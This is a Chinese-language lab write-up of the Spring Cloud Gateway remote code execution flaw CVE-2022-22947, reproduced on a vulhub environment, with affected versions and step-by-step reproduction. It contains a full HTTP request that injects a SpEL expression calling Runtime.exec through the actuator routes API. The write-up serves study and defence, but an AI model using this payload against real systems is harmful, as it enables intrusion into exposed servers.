服务器之家:专注于VPS、云服务器配置技术及软件下载分享
分类导航

PHP教程|ASP.NET教程|Java教程|ASP教程|编程技术|正则表达式|C/C++|IOS|C#|Swift|Android|VB|R语言|JavaScript|易语言|vb.net|

服务器之家 - 编程语言 - Java教程 - Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

2023-03-17 14:19Big&Bird Java教程

使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击,攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求,这篇文章主要介绍了Spring Cloud Gateway远程命令执行漏洞(CVE-202

声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。

漏洞描述

使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。

当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令。

影响范围

Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本

环境搭建

漏洞环境搭建,采用vulhub,搭建方法,自行搜索。

搭建成功后,访问一下

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

漏洞复现

1.查看actuator端点是开启的

抓包,并修改接口为/actuator

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

2. 查看/actuator/gateway/routes

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

返回的路由信息,意思是当访问index时,路由到http://example.com:80

3.创建路由

POST /actuator/gateway/routes/test HTTP/1.1
Host: 192.168.10.171:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Oct 2019 07:18:26 GMT
If-None-Match: "3147526947"
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 431

{
    "id": "test",
    "filters": [
        {
            "name": "AddResponseHeader",
            "args": {
                "value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}",
                "name": "cmd"
            }
        }
    ],
    "uri": "http://example.com:80",
    "order": 0
}

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

4.刷新路由

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

5.访问创建的路由

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

6.删除路由

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

7.再次刷新路由

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

8.然后,访问该路由,发现路由已被删除

Spring Cloud Gateway远程命令执行漏洞分析(CVE-2022-22947)

到此这篇关于Spring Cloud Gateway远程命令执行漏洞(CVE-2022-22947)的文章就介绍到这了,更多相关Spring Cloud Gateway远程命令执行漏洞内容请搜索服务器之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持服务器之家!

原文链接:https://blog.csdn.net/guo15890025019/article/details/129503346

延伸 · 阅读

精彩推荐
  • Java教程spring boot 默认异常处理的实现

    spring boot 默认异常处理的实现

    这篇文章主要介绍了spring boot 默认异常处理的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下...

    鲸冬香7832021-08-01
  • Java教程java简单手写版本实现时间轮算法

    java简单手写版本实现时间轮算法

    这篇文章主要为大家详细介绍了java简单手写版本实现时间轮算法,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下...

    扶苏l10072021-09-02
  • Java教程Java任务调度的常见实现方法与比较详解

    Java任务调度的常见实现方法与比较详解

    这篇文章主要介绍了Java任务调度的常见实现方法与比较,结合实例形式分析了Java任务调度的四种常见实现方法,使用区别及相关注意事项,需要的朋友可以参...

    fancylovejava3262020-12-16
  • Java教程Java集合类中文介绍

    Java集合类中文介绍

    本文首先对Java集合类框架做了简单说明,之后对主要类和为API做了介绍:Collection、List、Set、AbstractCollection、AbstractList、AbstractSet、Iterator、ListIterator。 ...

    java教程网6012019-10-18
  • Java教程maven install报错中程序包xxx不存在的问题解决

    maven install报错中程序包xxx不存在的问题解决

    本文主要介绍了maven install报错中程序包xxx不存在的问题解决,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的...

    wu555558912022-12-01
  • Java教程java编程之递归算法总结

    java编程之递归算法总结

    这篇文章主要介绍了java编程之递归算法总结,具有一定参考价值,需要的朋友可以了解下。...

    toMatser10392021-02-01
  • Java教程Java上传视频实例代码

    Java上传视频实例代码

    本文通过实例代码给大家讲解了java上传视频功能,代码分为页面前台和后台,工具类,具体实例代码大家通过本文学习吧...

    smart_hwt9742021-03-17
  • Java教程spring @Transactional 无效的解决方案

    spring @Transactional 无效的解决方案

    这篇文章主要介绍了spring @Transactional 无效的解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们...

    dezun12252021-07-26